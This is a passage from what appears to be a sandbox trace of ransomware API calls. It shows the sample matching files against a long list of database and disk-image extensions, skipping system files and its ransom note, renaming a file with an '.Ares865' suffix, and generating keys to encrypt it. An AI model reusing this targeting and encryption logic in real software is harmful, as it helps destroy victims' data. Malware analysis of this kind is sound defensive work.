-1 [0060.568] lstrlenW (lpString="tgz") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="tgz") returned -1 [0060.568] lstrlenW (lpString="vbox") returned 4 [0060.568] lstrcmpiW (lpString1=".DTD", lpString2="vbox") returned -1 [0060.568] lstrlenW (lpString="vdi") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="vdi") returned -1 [0060.568] lstrlenW (lpString="vhd") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="vhd") returned -1 [0060.568] lstrlenW (lpString="vhdx") returned 4 [0060.568] lstrcmpiW (lpString1=".DTD", lpString2="vhdx") returned -1 [0060.568] lstrlenW (lpString="avhd") returned 4 [0060.568] lstrcmpiW (lpString1=".DTD", lpString2="avhd") returned -1 [0060.568] lstrlenW (lpString="db") returned 2 [0060.568] lstrcmpiW (lpString1="TD", lpString2="db") returned 1 [0060.568] lstrlenW (lpString="db2") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="db2") returned 1 [0060.568] lstrlenW (lpString="db3") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="db3") returned 1 [0060.568] lstrlenW (lpString="dbf") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="dbf") returned 1 [0060.568] lstrlenW (lpString="mdf") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="mdf") returned -1 [0060.568] lstrlenW (lpString="mdb") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="mdb") returned -1 [0060.568] lstrlenW (lpString="sql") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="sql") returned -1 [0060.569] lstrlenW (lpString="sqlite") returned 6 [0060.569] lstrcmpiW (lpString1="NS.DTD", lpString2="sqlite") returned -1 [0060.569] lstrlenW (lpString="sqlite3") returned 7 [0060.569] lstrcmpiW (lpString1="KNS.DTD", lpString2="sqlite3") returned -1 [0060.569] lstrlenW (lpString="sqlitedb") returned 8 [0060.569] lstrcmpiW (lpString1="DKNS.DTD", lpString2="sqlitedb") returned -1 [0060.569] lstrlenW (lpString="xml") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="xml") returned -1 [0060.569] lstrlenW (lpString="$er") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="$er") returned 1 [0060.569] lstrlenW (lpString="4dd") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="4dd") returned 1 [0060.569] lstrlenW (lpString="4dl") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="4dl") returned 1 [0060.569] lstrlenW (lpString="^^^") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="^^^") returned 1 [0060.569] lstrlenW (lpString="abs") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="abs") returned 1 [0060.569] lstrlenW (lpString="abx") returned 3 [0060.569] lstrcmpiW (lpString1="DTD", lpString2="abx") returned 1 [0060.569] lstrlenW (lpString="accdb") returned 5 [0060.569] lstrcmpiW (lpString1="S.DTD", lpString2="accdb") returned 1 [0060.569] lstrlenW (lpString="accdc") returned 5 [0060.569] lstrcmpiW (lpString1="S.DTD", lpString2="accdc") returned 1 [0060.569] lstrlenW (lpString="accde") returned 5 [0060.570] lstrcmpiW (lpString1="S.DTD", lpString2="accde") returned 1 [0060.570] lstrlenW (lpString="accdr") returned 5 [0060.570] lstrcmpiW (lpString1="S.DTD", lpString2="accdr") returned 1 [0060.570] lstrlenW (lpString="accdt") returned 5 [0060.570] lstrcmpiW (lpString1="S.DTD", lpString2="accdt") returned 1 [0060.570] lstrlenW (lpString="accdw") returned 5 [0060.570] lstrcmpiW (lpString1="S.DTD", lpString2="accdw") returned 1 [0060.570] lstrlenW (lpString="accft") returned 5 [0060.570] lstrcmpiW (lpString1="S.DTD", lpString2="accft") returned 1 [0060.570] lstrlenW (lpString="adb") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="adb") returned 1 [0060.570] lstrlenW (lpString="adb") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="adb") returned 1 [0060.570] lstrlenW (lpString="ade") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="ade") returned 1 [0060.570] lstrlenW (lpString="adf") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="adf") returned 1 [0060.570] lstrlenW (lpString="adn") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="adn") returned 1 [0060.570] lstrlenW (lpString="adp") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="adp") returned 1 [0060.570] lstrlenW (lpString="alf") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="alf") returned 1 [0060.570] lstrlenW (lpString="ask") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="ask") returned 1 [0060.570] lstrlenW (lpString="btr") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="btr") returned 1 [0060.570] lstrlenW (lpString="cat") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="cat") returned 1 [0060.570] lstrlenW (lpString="cdb") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="cdb") returned 1 [0060.570] lstrlenW (lpString="ckp") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="ckp") returned 1 [0060.570] lstrlenW (lpString="cma") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="cma") returned 1 [0060.570] lstrlenW (lpString="cpd") returned 3 [0060.570] lstrcmpiW (lpString1="DTD", lpString2="cpd") returned 1 [0060.571] lstrlenW (lpString="dacpac") returned 6 [0060.571] lstrcmpiW (lpString1="NS.DTD", lpString2="dacpac") returned 1 [0060.571] lstrlenW (lpString="dad") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dad") returned 1 [0060.571] lstrlenW (lpString="dadiagrams") returned 10 [0060.571] lstrcmpiW (lpString1="MSDKNS.DTD", lpString2="dadiagrams") returned 1 [0060.571] lstrlenW (lpString="daschema") returned 8 [0060.571] lstrcmpiW (lpString1="DKNS.DTD", lpString2="daschema") returned 1 [0060.571] lstrlenW (lpString="db-journal") returned 10 [0060.571] lstrcmpiW (lpString1="MSDKNS.DTD", lpString2="db-journal") returned 1 [0060.571] lstrlenW (lpString="db-shm") returned 6 [0060.571] lstrcmpiW (lpString1="NS.DTD", lpString2="db-shm") returned 1 [0060.571] lstrlenW (lpString="db-wal") returned 6 [0060.571] lstrcmpiW (lpString1="NS.DTD", lpString2="db-wal") returned 1 [0060.571] lstrlenW (lpString="dbc") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dbc") returned 1 [0060.571] lstrlenW (lpString="dbs") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dbs") returned 1 [0060.571] lstrlenW (lpString="dbt") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dbt") returned 1 [0060.571] lstrlenW (lpString="dbv") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dbv") returned 1 [0060.571] lstrlenW (lpString="dbx") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dbx") returned 1 [0060.571] lstrlenW (lpString="dcb") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dcb") returned 1 [0060.571] lstrlenW (lpString="dct") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dct") returned 1 [0060.571] lstrlenW (lpString="dcx") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dcx") returned 1 [0060.571] lstrlenW (lpString="ddl") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="ddl") returned 1 [0060.571] lstrlenW (lpString="dlis") returned 4 [0060.571] lstrcmpiW (lpString1=".DTD", lpString2="dlis") returned -1 [0060.571] lstrlenW (lpString="dp1") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dp1") returned 1 [0060.571] lstrlenW (lpString="dqy") returned 3 [0060.571] lstrcmpiW (lpString1="DTD", lpString2="dqy") returned 1 [0060.571] lstrlenW (lpString="dsk") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="dsk") returned 1 [0060.572] lstrlenW (lpString="dsn") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="dsn") returned 1 [0060.572] lstrlenW (lpString="dtsx") returned 4 [0060.572] lstrcmpiW (lpString1=".DTD", lpString2="dtsx") returned -1 [0060.572] lstrlenW (lpString="dxl") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="dxl") returned -1 [0060.572] lstrlenW (lpString="eco") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="eco") returned -1 [0060.572] lstrlenW (lpString="ecx") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="ecx") returned -1 [0060.572] lstrlenW (lpString="edb") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="edb") returned -1 [0060.572] lstrlenW (lpString="epim") returned 4 [0060.572] lstrcmpiW (lpString1=".DTD", lpString2="epim") returned -1 [0060.572] lstrlenW (lpString="fcd") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fcd") returned -1 [0060.572] lstrlenW (lpString="fdb") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fdb") returned -1 [0060.572] lstrlenW (lpString="fic") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fic") returned -1 [0060.572] lstrlenW (lpString="flexolibrary") returned 12 [0060.572] lstrlenW (lpString="fm5") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fm5") returned -1 [0060.572] lstrlenW (lpString="fmp") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fmp") returned -1 [0060.572] lstrlenW (lpString="fmp12") returned 5 [0060.572] lstrcmpiW (lpString1="S.DTD", lpString2="fmp12") returned 1 [0060.572] lstrlenW (lpString="fmpsl") returned 5 [0060.572] lstrcmpiW (lpString1="S.DTD", lpString2="fmpsl") returned 1 [0060.572] lstrlenW (lpString="fol") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fol") returned -1 [0060.572] lstrlenW (lpString="fp3") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fp3") returned -1 [0060.572] lstrlenW (lpString="fp4") returned 3 [0060.572] lstrcmpiW (lpString1="DTD", lpString2="fp4") returned -1 [0060.572] lstrlenW (lpString="fp5") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="fp5") returned -1 [0060.573] lstrlenW (lpString="fp7") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="fp7") returned -1 [0060.573] lstrlenW (lpString="fpt") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="fpt") returned -1 [0060.573] lstrlenW (lpString="frm") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="frm") returned -1 [0060.573] lstrlenW (lpString="gdb") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="gdb") returned -1 [0060.573] lstrlenW (lpString="gdb") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="gdb") returned -1 [0060.573] lstrlenW (lpString="grdb") returned 4 [0060.573] lstrcmpiW (lpString1=".DTD", lpString2="grdb") returned -1 [0060.573] lstrlenW (lpString="gwi") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="gwi") returned -1 [0060.573] lstrlenW (lpString="hdb") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="hdb") returned -1 [0060.573] lstrlenW (lpString="his") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="his") returned -1 [0060.573] lstrlenW (lpString="ib") returned 2 [0060.573] lstrcmpiW (lpString1="TD", lpString2="ib") returned 1 [0060.573] lstrlenW (lpString="idb") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="idb") returned -1 [0060.573] lstrlenW (lpString="ihx") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="ihx") returned -1 [0060.573] lstrlenW (lpString="itdb") returned 4 [0060.573] lstrcmpiW (lpString1=".DTD", lpString2="itdb") returned -1 [0060.573] lstrlenW (lpString="itw") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="itw") returned -1 [0060.573] lstrlenW (lpString="jet") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="jet") returned -1 [0060.573] lstrlenW (lpString="jtx") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="jtx") returned -1 [0060.573] lstrlenW (lpString="kdb") returned 3 [0060.573] lstrcmpiW (lpString1="DTD", lpString2="kdb") returned -1 [0060.573] lstrlenW (lpString="kexi") returned 4 [0060.573] lstrcmpiW (lpString1=".DTD", lpString2="kexi") returned -1 [0060.573] lstrlenW (lpString="kexic") returned 5 [0060.574] lstrcmpiW (lpString1="S.DTD", lpString2="kexic") returned 1 [0060.574] lstrlenW (lpString="kexis") returned 5 [0060.574] lstrcmpiW (lpString1="S.DTD", lpString2="kexis") returned 1 [0060.574] lstrlenW (lpString="lgc") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="lgc") returned -1 [0060.574] lstrlenW (lpString="lwx") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="lwx") returned -1 [0060.574] lstrlenW (lpString="maf") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="maf") returned -1 [0060.574] lstrlenW (lpString="maq") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="maq") returned -1 [0060.574] lstrlenW (lpString="mar") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mar") returned -1 [0060.574] lstrlenW (lpString="marshal") returned 7 [0060.574] lstrcmpiW (lpString1="KNS.DTD", lpString2="marshal") returned -1 [0060.574] lstrlenW (lpString="mas") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mas") returned -1 [0060.574] lstrlenW (lpString="mav") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mav") returned -1 [0060.574] lstrlenW (lpString="maw") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="maw") returned -1 [0060.574] lstrlenW (lpString="mdbhtml") returned 7 [0060.574] lstrcmpiW (lpString1="KNS.DTD", lpString2="mdbhtml") returned -1 [0060.574] lstrlenW (lpString="mdn") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mdn") returned -1 [0060.574] lstrlenW (lpString="mdt") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mdt") returned -1 [0060.574] lstrlenW (lpString="mfd") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mfd") returned -1 [0060.574] lstrlenW (lpString="mpd") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mpd") returned -1 [0060.574] lstrlenW (lpString="mrg") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mrg") returned -1 [0060.574] lstrlenW (lpString="mud") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mud") returned -1 [0060.574] lstrlenW (lpString="mwb") returned 3 [0060.574] lstrcmpiW (lpString1="DTD", lpString2="mwb") returned -1 [0060.574] lstrlenW (lpString="myd") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="myd") returned -1 [0060.575] lstrlenW (lpString="ndf") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="ndf") returned -1 [0060.575] lstrlenW (lpString="nnt") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="nnt") returned -1 [0060.575] lstrlenW (lpString="nrmlib") returned 6 [0060.575] lstrcmpiW (lpString1="NS.DTD", lpString2="nrmlib") returned 1 [0060.575] lstrlenW (lpString="ns2") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="ns2") returned -1 [0060.575] lstrlenW (lpString="ns3") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="ns3") returned -1 [0060.575] lstrlenW (lpString="ns4") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="ns4") returned -1 [0060.575] lstrlenW (lpString="nsf") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="nsf") returned -1 [0060.575] lstrlenW (lpString="nv") returned 2 [0060.575] lstrcmpiW (lpString1="TD", lpString2="nv") returned 1 [0060.575] lstrlenW (lpString="nv2") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="nv2") returned -1 [0060.575] lstrlenW (lpString="nwdb") returned 4 [0060.575] lstrcmpiW (lpString1=".DTD", lpString2="nwdb") returned -1 [0060.575] lstrlenW (lpString="nyf") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="nyf") returned -1 [0060.575] lstrlenW (lpString="odb") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="odb") returned -1 [0060.575] lstrlenW (lpString="odb") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="odb") returned -1 [0060.575] lstrlenW (lpString="oqy") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="oqy") returned -1 [0060.575] lstrlenW (lpString="ora") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="ora") returned -1 [0060.575] lstrlenW (lpString="orx") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="orx") returned -1 [0060.575] lstrlenW (lpString="owc") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="owc") returned -1 [0060.575] lstrlenW (lpString="p96") returned 3 [0060.575] lstrcmpiW (lpString1="DTD", lpString2="p96") returned -1 [0060.576] lstrlenW (lpString="p97") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="p97") returned -1 [0060.576] lstrlenW (lpString="pan") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="pan") returned -1 [0060.576] lstrlenW (lpString="pdb") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="pdb") returned -1 [0060.576] lstrlenW (lpString="pdm") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="pdm") returned -1 [0060.576] lstrlenW (lpString="pnz") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="pnz") returned -1 [0060.576] lstrlenW (lpString="qry") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="qry") returned -1 [0060.576] lstrlenW (lpString="qvd") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="qvd") returned -1 [0060.576] lstrlenW (lpString="rbf") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="rbf") returned -1 [0060.576] lstrlenW (lpString="rctd") returned 4 [0060.576] lstrcmpiW (lpString1=".DTD", lpString2="rctd") returned -1 [0060.576] lstrlenW (lpString="rod") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="rod") returned -1 [0060.576] lstrlenW (lpString="rodx") returned 4 [0060.576] lstrcmpiW (lpString1=".DTD", lpString2="rodx") returned -1 [0060.576] lstrlenW (lpString="rpd") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="rpd") returned -1 [0060.576] lstrlenW (lpString="rsd") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="rsd") returned -1 [0060.576] lstrlenW (lpString="sas7bdat") returned 8 [0060.576] lstrcmpiW (lpString1="DKNS.DTD", lpString2="sas7bdat") returned -1 [0060.576] lstrlenW (lpString="sbf") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="sbf") returned -1 [0060.576] lstrlenW (lpString="scx") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="scx") returned -1 [0060.576] lstrlenW (lpString="sdb") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="sdb") returned -1 [0060.576] lstrlenW (lpString="sdc") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="sdc") returned -1 [0060.576] lstrlenW (lpString="sdf") returned 3 [0060.576] lstrcmpiW (lpString1="DTD", lpString2="sdf") returned -1 [0060.577] lstrlenW (lpString="sis") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="sis") returned -1 [0060.577] lstrlenW (lpString="spq") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="spq") returned -1 [0060.577] lstrlenW (lpString="te") returned 2 [0060.577] lstrcmpiW (lpString1="TD", lpString2="te") returned -1 [0060.577] lstrlenW (lpString="teacher") returned 7 [0060.577] lstrcmpiW (lpString1="KNS.DTD", lpString2="teacher") returned -1 [0060.577] lstrlenW (lpString="tmd") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="tmd") returned -1 [0060.577] lstrlenW (lpString="tps") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="tps") returned -1 [0060.577] lstrlenW (lpString="trc") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="trc") returned -1 [0060.577] lstrlenW (lpString="trc") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="trc") returned -1 [0060.577] lstrlenW (lpString="trm") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="trm") returned -1 [0060.577] lstrlenW (lpString="udb") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="udb") returned -1 [0060.577] lstrlenW (lpString="udl") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="udl") returned -1 [0060.577] lstrlenW (lpString="usr") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="usr") returned -1 [0060.577] lstrlenW (lpString="v12") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="v12") returned -1 [0060.577] lstrlenW (lpString="vis") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="vis") returned -1 [0060.577] lstrlenW (lpString="vpd") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="vpd") returned -1 [0060.577] lstrlenW (lpString="vvv") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="vvv") returned -1 [0060.577] lstrlenW (lpString="wdb") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="wdb") returned -1 [0060.577] lstrlenW (lpString="wmdb") returned 4 [0060.577] lstrcmpiW (lpString1=".DTD", lpString2="wmdb") returned -1 [0060.577] lstrlenW (lpString="wrk") returned 3 [0060.577] lstrcmpiW (lpString1="DTD", lpString2="wrk") returned -1 [0060.577] lstrlenW (lpString="xdb") returned 3 [0060.578] lstrcmpiW (lpString1="DTD", lpString2="xdb") returned -1 [0060.578] lstrlenW (lpString="xld") returned 3 [0060.578] lstrcmpiW (lpString1="DTD", lpString2="xld") returned -1 [0060.578] lstrlenW (lpString="xmlff") returned 5 [0060.578] lstrcmpiW (lpString1="S.DTD", lpString2="xmlff") returned -1 [0060.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865") returned 85 [0060.578] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd.ares865"), dwFlags=0x1) returned 1 [0060.579] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.580] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=498) returned 1 [0060.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.581] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.581] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.581] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x164 [0060.583] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0060.583] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.584] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.584] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.585] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.585] CloseHandle (hObject=0x164) returned 1 [0060.585] CloseHandle (hObject=0x15c) returned 1 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.585] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2ad0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML.Ares865", cAlternateFileName="WMSDKN~1.ARE")) returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="aoldtz.exe") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2=".") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="..") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="windows") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="bootmgr") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="temp") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="pagefile.sys") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="boot") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="ids.txt") returned 1 [0060.585] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="ntuser.dat") returned 1 [0060.586] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="perflogs") returned 1 [0060.586] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="MSBuild") returned 1 [0060.586] lstrlenW (lpString="WMSDKNS.XML.Ares865") returned 19 [0060.586] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows 